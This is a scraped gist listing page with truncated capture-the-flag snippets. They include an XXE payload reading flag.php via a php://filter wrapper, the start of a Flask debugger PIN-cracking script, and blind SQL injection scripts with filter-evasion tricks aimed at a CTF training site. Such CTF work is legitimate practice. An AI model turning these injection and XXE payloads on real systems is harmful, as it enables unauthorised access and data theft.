The goal was to bypass WAF protection to access local resources.
app.re_ip = re.compile('\A(\d+)\.(\d+)\.(\d+)\.(\d+)\Z')
def valid_ip(ip):
matches = app.re_ip.match(ip)
Imtinmin
/ README.md
Created
September 25, 2020 17:15
— forked from terjanq/README.md
TokyoWesterns CTF 2020 | writeups by @terjanq
Imtinmin
/ ServerMain.java
Created
November 25, 2019 02:49
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import javax.swing.*; | |
| import java.awt.event.*; | |
| import java.io.*; | |
| import java.net.*; | |
| import java.util.logging.*; | |
| import java.lang.*; | |
| public class ServerMain extends javax.swing.JFrame implements Runnable{ | |
| private JPanel panel1; | |
| private JButton startButton; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import hashlib | |
| from itertools import chain | |
| import requests | |
| probably_public_bits = [ | |
| 'ctf',# username | |
| 'flask.app',# modname | |
| 'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__')) | |
| '/usr/local/lib/python3.6/site-packages/flask/app.py' # getattr(mod, '__file__', None), | |
| ] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var num = [2,3,4,5,6,7,8,9,10,11,12,13,14,15,16]; | |
| for(var i=0;i<num.length;i++) | |
| { | |
| var opts = document.getElementById("DataGrid1__ctl"+num[i]+"_JS1").getElementsByTagName("option"); | |
| for (var j=0; j<opts.length; j++){ | |
| if (opts[j].value=="优"){ | |
| opts[j].selected=true; | |
| } | |
| } | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * @Created by phpstorm | |
| * @User: tinmin | |
| * @Date: 2019/10/18 | |
| * @Time: 下午5:11 | |
| * @Challenge: Bugku-login4 | |
| */ | |
| $username = "admix"; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0"?> | |
| <!DOCTYPE netspi [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php" >]> | |
| <root> | |
| <glossary> | |
| <title>example glossary</title> | |
| <GlossDiv> | |
| <title>S</title> | |
| <GlossList> | |
| <GlossEntry> | |
| <ID>SGML</ID> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| url = "http://ctf5.shiyanbar.com/web/index_3.php" | |
| def length(sql): | |
| for i in range(50): | |
| payload = "0' or if(length(({}))={},'1',null)='1".format(sql,i) | |
| tmp = { | |
| 'id':payload |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import string | |
| url = 'http://ctf5.shiyanbar.com/web/earnest/index.php' | |
| dic = string.ascii_letters + string.digits + '!_{}@~.' | |
| def payload(sql): | |
| return sql.replace(' ',chr(0x0a)).replace('or','oorr') | |
| def foo(): |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| //__call方法 | |
| namespace app\web\controller; | |
| class Profile{ | |
| } | |
| class Register{} | |
| $a = new Register(); |